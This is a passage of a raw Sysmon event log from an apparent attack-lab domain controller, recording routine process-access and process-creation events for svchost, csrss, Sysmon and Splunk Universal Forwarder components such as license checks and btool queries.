10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-4D00-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0C-5F80-4D00-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.028{733EE690-3E0C-5F80-4D00-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5A00-000000007F01}3964C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5A00-000000007F01}3964C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3E0D-5F80-5900-000000007F01}39043840C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0D-5F80-5A00-000000007F01}3964C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.867{733EE690-3E0D-5F80-5A00-000000007F01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0D-5F80-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5900-000000007F01}3904C:\Program 